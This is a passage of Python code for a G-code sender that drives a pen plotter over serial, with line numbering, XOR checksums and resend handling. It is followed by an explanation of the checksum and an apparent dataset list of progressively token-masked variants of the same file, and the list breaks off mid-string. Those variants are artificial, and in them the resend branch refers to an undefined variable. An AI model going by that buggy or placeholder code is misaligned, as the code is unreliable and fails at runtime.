        self.command_queue.put_nowait("M340 P0 S{}".format(self.PEN_DROP_PULSE))
        self.command_queue.put_nowait("G4 S1")

    def on_pen_lift(self):
        self.command_queue.put_nowait("M400")
        self.command_queue.put_nowait("M340 P0 S{}".format(self.PEN_LIFT_PULSE))
        self.command_queue.put_nowait("G4 P500")

    def start(self):
        self._stop.clear()
        self.parsing_thread = threading.Thread(target=self.start_processing)
        self.parsing_thread.daemon = True
        self.parsing_thread.start()

    def stop(self):
        if self.plotter:
            self.plotter.close()
        self.plotter = None

    def __del__(self):
        self.stop_thread()
        self.stop()

    def start_processing(self):
        # M110 resets the firmware's expected line number, G90 selects
        # absolute coordinates, G28 homes the axes.
        self.command_queue.put_nowait('M110 N2')
        self.command_queue.put_nowait('G90')
        self.command_queue.put_nowait('G28')
        self.plotter = serial.Serial(PORT, 115200, timeout=1)

        self._read_and_process_and_wait_for_ok(break_on_timeout=True)

        while True:
            while not self.command_queue.empty():
                command = self.command_queue.get_nowait()
                self.command_queue.task_done()
                self._send_line(command)
                self._read_and_process_and_wait_for_ok()

            time.sleep(0.5)

    def _send_line(self, line):
        self.last_command = line
        command = 'N{} {} '.format(self.line_number, line)
        command = '{}*{}\n'.format(command, self._checksum(command))
        self.line_number += 1
        self.plotter.write(command.encode('utf-8'))

    def _read_line(self):
        response = self.plotter.readline()
        print("READ: {}".format(response))
        return response.decode('utf-8')

    def _checksum(self, command):
        # XOR of every byte before the '*', as expected by RepRap firmwares.
        checksum = 0
        for char in command:
            byte_char = char.encode('utf-8')
            int_char = int.from_bytes(byte_char, 'big')
            checksum = checksum ^ int_char
        return checksum

    def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
        response = self._read_line()

        if not response.strip() and break_on_timeout:
            return

        previous_line_number = self.line_number - 1
        while not response.startswith('ok'):
            if response.startswith((f"rs {previous_line_number}", f"Resend:{previous_line_number}")):
                print('resend request: {}'.format(response))
                # Rewind the counter and resend the last raw line.
                self.line_number = self.line_number - 1
                self._send_line(self.last_command)
                response = self._read_line()
            elif response.startswith(('rs', 'Resend')):
                raise Exception('requested resend of some other line number: {}'.format(response))
            elif response.startswith('!!'):
                raise Exception('printer fault')
            elif response.startswith('//'):
                print('comment: {}'.format(response))
                response = self._read_line()
            elif response.startswith('wait'):
                response = self._read_line()
                time.sleep(0.5)
            elif response.startswith('start'):
                return
            else:
                print('unknown response: {}'.format(response))
                response = self._read_line()
                #raise Exception('unknown response: {}'.format(response))

    def stop_thread(self):
        self._stop.set()
        self.parsing_thread = None
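_send_line above frames every line as N<line-number> <command> *<checksum>, the RepRap/Marlin serial convention: the checksum is the XOR of every byte before the '*', which is what lets the firmware detect a corrupted line and answer with the resend request handled in _read_and_process_and_wait_for_ok. A standalone check of the arithmetic (the sample line is arbitrary):

def checksum(command):
    # XOR every byte before the '*', same arithmetic as GcodeSender._checksum.
    cs = 0
    for byte in command.encode('utf-8'):
        cs ^= byte
    return cs

line = 'N1 M110 N2 '  # note the trailing space, which is checksummed too
print('{}*{}'.format(line, checksum(line)))  # prints: N1 M110 N2 *94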
[ "from pydispatch import dispatcher\nimport time\nimport serial\nimport threading\nfrom queue import Queue\n\nPORT='/dev/ttys005'\n#PORT='/dev/tty.usbmodem1461'\nSPEED=4800.0\n\nclass GcodeSender(object):\n\n PEN_LIFT_PULSE = 1500\n PEN_DROP_PULSE = 800\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT', sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x,y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x,y,SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n #print(\"pen drop\")\n self.command_queue.put_nowait(\"M400\")\n self.command_queue.put_nowait(\"M340 P0 S{}\".format(self.PEN_DROP_PULSE))\n self.command_queue.put_nowait(\"G4 S1\")\n\n def on_pen_lift(self):\n #print(\"pen lift\")\n self.command_queue.put_nowait(\"M400\")\n self.command_queue.put_nowait(\"M340 P0 S{}\".format(self.PEN_LIFT_PULSE))\n self.command_queue.put_nowait(\"G4 P500\")\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if(self.plotter):\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n #print(\"SEND: {}\".format(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n \n def _read_line(self):\n response = self.plotter.readline()\n print(\"READ: {}\".format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n\n if not response.strip() and break_on_timeout:\n return\n\n previous_line_number = self.line_number-1\n while not response.startswith('ok'):\n if response.startswith((f\"rs {previous_line_number}\", f\"Resend:{previous_line_number}\")):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number-1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception('requested resend of some other line number: {}'.format(response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n 
elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n #raise Exception('unknown response: {}'.format(response))\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n\n", "from pydispatch import dispatcher\nimport time\nimport serial\nimport threading\nfrom queue import Queue\nPORT = '/dev/ttys005'\nSPEED = 4800.0\n\n\nclass GcodeSender(object):\n PEN_LIFT_PULSE = 1500\n PEN_DROP_PULSE = 800\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested 
resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\nPORT = '/dev/ttys005'\nSPEED = 4800.0\n\n\nclass GcodeSender(object):\n PEN_LIFT_PULSE = 1500\n PEN_DROP_PULSE = 800\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = 
self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n PEN_LIFT_PULSE = 1500\n PEN_DROP_PULSE = 800\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n 
self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n 
f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 
1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n <function token>\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def 
stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n <function token>\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n 
def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n <function token>\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n 